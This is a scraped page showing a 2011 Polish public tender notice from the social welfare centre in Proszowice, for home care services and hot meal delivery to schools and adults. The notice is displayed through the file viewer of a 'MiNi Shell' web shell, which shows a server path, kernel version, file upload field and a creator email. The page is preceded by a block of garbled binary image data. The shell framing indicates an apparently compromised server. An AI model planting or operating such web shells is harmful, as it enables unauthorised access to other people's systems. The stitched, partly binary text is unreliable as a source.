JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20111212/422570-N-2011.html

<p class="kh_header"><b>Proszowice: Przygotowywanie i dowożenie ciepłych posiłków oraz świadczenie usług opiekuńczych na terenie Gminy Proszowice</b><br>
<b>Numer ogłoszenia: 422570 - 2011; data zamieszczenia: 12.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej w Proszowicach , ul. 3 Maja 72, 32-100 Proszowice, woj. małopolskie, tel. 12 386 22 12, faks 12 386 22 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mgops.proszowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowywanie i dowożenie ciepłych posiłków oraz świadczenie usług opiekuńczych na terenie Gminy Proszowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie usług opiekuńczych dla osób będących podopiecznymi zamawiającego, a w szczególności:
- zakup artykułów spożywczych i innych potrzebnych w gospodarstwie domowym
- dostarczenie lub przygotowywanie posiłków i pomoc przy ich spożywaniu
- utrzymanie w czystości naczyń stołowych, kuchennych i innego rodzaju sprzętu gospodarstwa domowego służącemu podopiecznemu
- utrzymanie w czystości naczyń i sprzętu sanitarnego i urządzeń sanitarnych
- pielęgnacją i dbanie o higienę osobistą podopiecznych, którzy nie mogą tego robić samodzielnie
- dbanie o czystość bielizny osobistej, pościelowej i odzieży podopiecznego
- palenie w piecu, przynoszenie wody, węgla
- utrzymanie w czystości pomieszczeń użytkowanych przez osobą korzystającą z opieki
- wykonywanie bieżących porządków
- mycie okien raz na kwartał
- pranie firan raz na kwartał
- kontakt z lekarzem w sprawach zdrowotnych podopiecznego, zamawianie wizyt lekarskich, realizacja recept
- organizowanie spacerów, doprowadzanie i odprowadzanie do/i z ośrodków wsparcia
- załatwianie spraw urzędowych
- prowadzenie zeszytu wydatków i rozliczanie się z podopiecznym z wydanych pieniędzy
- podtrzymywanie indywidualnych zainteresowań (dostarczanie prasy, książek, czytanie, organizowanie kontaktów sąsiedzkich, zachęcanie do wykonywania robótek ręcznych, itp.)
- inne - zgodnie z życzeniem zamawiającego.
Ilość osób objętych usługami:
- około 14 osób na terenie miasta Proszowice
- około 11 osób na terenie Gminy Proszowice
Dla jednej osoby średniomiesięcznie (21 dni) przewiduje się świadczenie usług opiekuńczych w ilości około 27 godzin.
Świadczenie usług odbywać się będzie w godzinach 8:00 - 16:00
W zakres usług opiekuńczych nie wchodzą usługi specjalistyczne.
Usługi świadczone będą od poniedziałku do piątku
W szczególnie uzasadnionych przypadkach usługi mogą być zlecone przez Zamawiającego telefonicznie, a ich potwierdzenie następować będzie w terminie 7 dni od daty zgłoszenia.
Liczba osób objętych opieką podczas trwania umowy może odbiegać od założeń przyjętych w niniejszych SIWZ,  w zależności od posiadanych środków finansowych Zamawiającego, oraz zapotrzebowania środowiskowego.

2.Przedmiotem postępowania jest przygotowywanie i dostarczanie posiłków obiadowych następującego rodzaju:
- Poniedziałek: drugie danie (280g w tym: 130g danie mięsne + 150g ziemniaki, ryż, kasza, makaron itp.) + surówka wieloskładnikowa (150g) + sok w kartoniku (250ml) + mandarynka (150g) (+/- 5%)).
- Wtorek: zupa (300ml) + bułka (60g) + banan (250g) (+/- 5%),
- Środa: drugie danie (280g w tym: 130g danie mięsne + 150g ziemniaki, ryż, kasza, makaron itp.) + surówka wieloskładnikowa (150g) + sok w kartoniku (250ml) + jabłko (150g) (+/- 5%)).
- Czwartek: zupa (300ml) + bułka (60g) + banan (250g) (+/- 5%),
- Piątek: dania bezmięsne np. pierogi, ryba + ziemniaki, naleśniki itp. (280g) + sok w kartoniku (250ml) + mandarynka (150g) (+/- 5%).

Szacowana ilość posiłków dla młodzieży szkolnej: 
SP Szczytniki - 7 posiłków/dziennie
Zespół Szkół w Kościelcu - 15 posiłków/dziennie
SP Żębocin - 22 posiłków/dziennie
Zespół Szkół w Klimontowie - 11 posiłków/dziennie
Gimnazjum w Proszowicach - 12 posiłków/dziennie
SP Proszowice - 44 posiłków/dziennie
SP Stogniowice - 4 posiłków/dziennie
SP Koczanów - 13 posiłków/dziennie
Szacowana ilość posiłków dla osób dorosłych wraz z zapewnieniem miejsca spożycia (stołówki) - 48 posiłków/dziennie.

Zamawiający zobowiązuje Wykonawcę aby zapewnił różnorodność zup i drugich dań z zachowaniem norm kaloryczności, wynoszącej minimum 600 kalorii.
Zamawiający zastrzega sobie prawo możliwości wykupienia posiłków przez uczniów nie objętych dożywianiem, w cenie podanej w złożonej ofercie.
Wykonawca zobowiązany jest do dostarczenia gorących posiłków w sposób zapewniający odpowiednie warunki higieniczno-sanitarne.
Wybrany Wykonawca jest zobowiązany do odbioru resztek i odpadów pokonsumpcyjnych oraz jednorazowych naczyń pozostałych po spożyciu posiłków.
Wykonawca gorącą zupę i drugie danie winien dostarczać w pojemnikach termoizolacyjnych lub termosach wraz z jednorazowymi talerzami i sztućcami (nóż, widelec, łyżka).
Temperatura zupy oraz temperatura drugiego dania winna wynosić 60oC.
Wybrany Wykonawca zobowiązany jest do podawania tygodniowego jadłospisu do wiadomości Zamawiającego oraz dyrektorów poszczególnych szkół, do których dostarczane będą posiłki najpóźniej przed obiadem w pierwszy dzień tygodnia, w którym jadłospis obowiązuje.
W przypadku młodzieży szkolnej posiłki zostaną przygotowane, dostarczone i podane przez Wykonawcę w poszczególnych szkołach, w przypadku osób dorosłych Wykonawca ma obowiązek zapewnienia miejsca spożycia posiłków na terenie miasta Proszowice, na własny koszt.


Liczba posiłków podczas trwania umowy może odbiegać od założeń przyjętych w niniejszej SIWZ, w zależności od posiadanych środków finansowych Zamawiającego, oraz zapotrzebowania środowiskowego.
Wykonawca musi zapewnić miejsce spożycia (stołówki) dla wszystkich osób dorosłych, na terenie miasta Proszowice, na własny koszt.
Posiłki obiadowe dla młodzieży szkolnej dostarczane będą do poszczególnych szkół w czasie trwania roku szkolnego od poniedziałku do piątku, z wyłączeniem dni ustawowo wolnych od zajęć szkolnych.
Posiłki obiadowe dla osób dorosłych dostarczane i podawane będą w ciągu całego roku kalendarzowego od poniedziałku do piątku, z wyłączeniem dni ustawowo wolnych od pracy.
Do obowiązków Wykonawcy należeć będzie przygotowanie i dostarczenie posiłków do wskazanego miejsca (szkoły). Podawanie posiłków odbywać się będzie w naczyniach Wykonawcy, wraz z zapewnieniem sztućców..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Wielkość zamówień uzupelniajacych - 20%</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mgops.proszowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego, tj.
ul. 3 Maja 72; 32-100 Proszowice
pok. nr 21.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.12.2011 godzina 10:00, miejsce: W siedzibie Zamawiającego, tj.
ul. 3 Maja 72; 32-100 Proszowice
pok. nr 21.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie usług opiekuńczych dla osób będących podopiecznymi zamawiającego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usług opiekuńczych dla osób będących podopiecznymi zamawiającego, a w szczególności:
- zakup artykułów spożywczych i innych potrzebnych w gospodarstwie domowym
- dostarczenie lub przygotowywanie posiłków i pomoc przy ich spożywaniu
- utrzymanie w czystości naczyń stołowych, kuchennych i innego rodzaju sprzętu gospodarstwa domowego służącemu podopiecznemu
- utrzymanie w czystości naczyń i sprzętu sanitarnego i urządzeń sanitarnych
- pielęgnacją i dbanie o higienę osobistą podopiecznych, którzy nie mogą tego robić samodzielnie
- dbanie o czystość bielizny osobistej, pościelowej i odzieży podopiecznego
- palenie w piecu, przynoszenie wody, węgla
- utrzymanie w czystości pomieszczeń użytkowanych przez osobą korzystającą z opieki
- wykonywanie bieżących porządków
- mycie okien raz na kwartał
- pranie firan raz na kwartał
- kontakt z lekarzem w sprawach zdrowotnych podopiecznego, zamawianie wizyt lekarskich, realizacja recept
- organizowanie spacerów, doprowadzanie i odprowadzanie do/i z ośrodków wsparcia
- załatwianie spraw urzędowych
- prowadzenie zeszytu wydatków i rozliczanie się z podopiecznym z wydanych pieniędzy
- podtrzymywanie indywidualnych zainteresowań (dostarczanie prasy, książek, czytanie, organizowanie kontaktów sąsiedzkich, zachęcanie do wykonywania robótek ręcznych, itp.)
- inne - zgodnie z życzeniem zamawiającego.
Ilość osób objętych usługami:
- około 14 osób na terenie miasta Proszowice
- około 11 osób na terenie Gminy Proszowice
Dla jednej osoby średniomiesięcznie (21 dni) przewiduje się świadczenie usług opiekuńczych w ilości około 27 godzin.
Świadczenie usług odbywać się będzie w godzinach 8:00 - 16:00
W zakres usług opiekuńczych nie wchodzą usługi specjalistyczne.
Usługi świadczone będą od poniedziałku do piątku
W szczególnie uzasadnionych przypadkach usługi mogą być zlecone przez Zamawiającego telefonicznie, a ich potwierdzenie następować będzie w terminie 7 dni od daty zgłoszenia.
Liczba osób objętych opieką podczas trwania umowy może odbiegać od założeń przyjętych w niniejszych SIWZ,  w zależności od posiadanych środków finansowych Zamawiającego, oraz zapotrzebowania środowiskowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przygotowywanie i dostarczanie posiłków obiadowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem postępowania jest przygotowywanie i dostarczanie posiłków obiadowych następującego rodzaju:
- Poniedziałek: drugie danie (280g w tym: 130g danie mięsne + 150g ziemniaki, ryż, kasza, makaron itp.) + surówka wieloskładnikowa (150g) + sok w kartoniku (250ml) + mandarynka (150g) (+/- 5%)).
- Wtorek: zupa (300ml) + bułka (60g) + banan (250g) (+/- 5%),
- Środa: drugie danie (280g w tym: 130g danie mięsne + 150g ziemniaki, ryż, kasza, makaron itp.) + surówka wieloskładnikowa (150g) + sok w kartoniku (250ml) + jabłko (150g) (+/- 5%)).
- Czwartek: zupa (300ml) + bułka (60g) + banan (250g) (+/- 5%),
- Piątek: dania bezmięsne np. pierogi, ryba + ziemniaki, naleśniki itp. (280g) + sok w kartoniku (250ml) + mandarynka (150g) (+/- 5%).

Szacowana ilość posiłków dla młodzieży szkolnej: 
SP Szczytniki - 7 posiłków/dziennie
Zespół Szkół w Kościelcu - 15 posiłków/dziennie
SP Żębocin - 22 posiłków/dziennie
Zespół Szkół w Klimontowie - 11 posiłków/dziennie
Gimnazjum w Proszowicach - 12 posiłków/dziennie
SP Proszowice - 44 posiłków/dziennie
SP Stogniowice - 4 posiłków/dziennie
SP Koczanów - 13 posiłków/dziennie
Szacowana ilość posiłków dla osób dorosłych wraz z zapewnieniem miejsca spożycia (stołówki) - 48 posiłków/dziennie.
Zamawiający zobowiązuje Wykonawcę aby zapewnił różnorodność zup i drugich dań z zachowaniem norm kaloryczności, wynoszącej minimum 600 kalorii.
Zamawiający zastrzega sobie prawo możliwości wykupienia posiłków przez uczniów nie objętych dożywianiem, w cenie podanej w złożonej ofercie.
Wykonawca zobowiązany jest do dostarczenia gorących posiłków w sposób zapewniający odpowiednie warunki higieniczno-sanitarne.
Wybrany Wykonawca jest zobowiązany do odbioru resztek i odpadów pokonsumpcyjnych oraz jednorazowych naczyń pozostałych po spożyciu posiłków.
Wykonawca gorącą zupę i drugie danie winien dostarczać w pojemnikach termoizolacyjnych lub termosach wraz z jednorazowymi talerzami i sztućcami (nóż, widelec, łyżka).
Temperatura zupy oraz temperatura drugiego dania winna wynosić 60oC.
Wybrany Wykonawca zobowiązany jest do podawania tygodniowego jadłospisu do wiadomości Zamawiającego oraz dyrektorów poszczególnych szkół, do których dostarczane będą posiłki najpóźniej przed obiadem w pierwszy dzień tygodnia, w którym jadłospis obowiązuje.
W przypadku młodzieży szkolnej posiłki zostaną przygotowane, dostarczone i podane przez Wykonawcę w poszczególnych szkołach, w przypadku osób dorosłych Wykonawca ma obowiązek zapewnienia miejsca spożycia posiłków na terenie miasta Proszowice, na własny koszt.
Liczba posiłków podczas trwania umowy może odbiegać od założeń przyjętych w niniejszej SIWZ, w zależności od posiadanych środków finansowych Zamawiającego, oraz zapotrzebowania środowiskowego.
Wykonawca musi zapewnić miejsce spożycia (stołówki) dla wszystkich osób dorosłych, na terenie miasta Proszowice, na własny koszt.
Posiłki obiadowe dla młodzieży szkolnej dostarczane będą do poszczególnych szkół w czasie trwania roku szkolnego od poniedziałku do piątku, z wyłączeniem dni ustawowo wolnych od zajęć szkolnych.
Posiłki obiadowe dla osób dorosłych dostarczane i podawane będą w ciągu całego roku kalendarzowego od poniedziałku do piątku, z wyłączeniem dni ustawowo wolnych od pracy.
Do obowiązków Wykonawcy należeć będzie przygotowanie i dostarczenie posiłków do wskazanego miejsca (szkoły). Podawanie posiłków odbywać się będzie w naczyniach Wykonawcy, wraz z zapewnieniem sztućców..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com